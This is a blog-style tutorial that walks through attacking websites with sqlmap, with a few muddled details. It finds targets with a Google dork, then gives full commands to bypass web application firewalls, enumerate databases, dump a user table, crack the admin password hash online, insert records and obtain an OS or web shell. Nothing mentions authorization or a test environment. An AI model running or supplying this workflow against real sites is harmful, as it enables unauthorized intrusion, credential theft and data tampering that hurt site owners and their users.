Best SQLMAP Tutorial

I am just gonna write the commands and give relevant explanation. Lets say the target website is test.com. Follow the below steps:

Step 1:

Write the google dork for find parameter injectable in test.com

inurl:index.php?id= site:www.test.com (This is what i use most of the time…you can write your own)

Step 2:

Install SQLMAP or use Kali Linux because it already comes with sqlmap pre installed

Lets find whether the website is vulnerable to SQL injection

sqlmap -u “https://www.test.com/index.php?id=10” –threads=10 –tamper=space2hash –random-agent –dbs

Explanation:

-u : “Mention the target URL”

–threads=10 : To increase the speed of the injection process

–tamper=space2hash : To Bypass any WAF (Web Application Firewall ex: Mod Security).space2hash only works for MYSQL database

–random-agent : Just to create a random user agent . user agent is the name of the browser.

–current-db : To find the name of the current database the application is using

Step 3:

Lets say that after completing step 2 you get the database name as “testdb“. Now the game is ON :)… Use the below command to get the tables in that database

sqlmap -u “https://www.test.com/index.php?id=10” –threads=10 –tamper=space2hash –random-agent -D testdb –tables

Step 4:

Lets say that after completing step 2 you get the database name as “user“.Now we are actually turned on…lets retrieve the columns in the table user

sqlmap -u “https://www.test.com/index.php?id=10” –threads=10 –tamper=space2hash –random-agent -D testdb -T user –columns

Step 5:

So…lets dump all the content from the table user

sqlmap -u “https://www.test.com/index.php?id=10” –threads=10 –tamper=space2hash –random-agent -D testdb -T user –dump

The Output might look like this

+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash                                                | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | c7a85972e188c669f0d1e24528a772a35DIpzzDHFOwnCvPonu  | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+

Now this hash looks like MD5 ( we can determine this by the length of the hash). Go to http://www.md5online.org/md5-decrypt.html and type the hash in the box and click decrypt. The password will be welcome@123

See life is not as bad as it looks….

When Life gets tough…..Below I am giving some scenarios. May be I am not right but it had helped me sometimes

Scenario 1:

Lets imagine you want to insert your own record in the table. Use the below command

sqlmap -u “https://www.test.com/index.php?id=10” –threads=10 –tamper=space2hash –random-agent -D testdb -T user –sql-query=INSERT INTO table_name ( field1, field2,…fieldN )VALUES( value1, value2,…valueN )

Note: I am not gonna explain the above query. Visit https://www.tutorialspoint.com/mysql/mysql-insert-query.htm for more information on sql queries

Scenario 2:

You want to upload Web Shell using SQL injection.

sqlmap -u “https://www.test.com/index.php?id=10” –threads=10 –tamper=space2hash –random-agent -D testdb -T user –os-shell

Scenario 3:

If the database is behind proxy…..well sqlmap has a solution for that too

sqlmap -u “https://www.test.com/index.php?id=10” –threads=10 –tamper=space2hash –random-agent -D testdb -T user –ignore-proxy

That’s it guys …i cannot write more…its boring but if you guys wanna master this tool check out the below link …it is intense….. 🙂

 

 

References :

https://github.com/sqlmapproject/sqlmap

http://www.guru99.com/learn-sql-injection-with-practical-example.html

 

14 thoughts on “Best SQLMAP Tutorial

Leave a Reply

Your email address will not be published. Required fields are marked *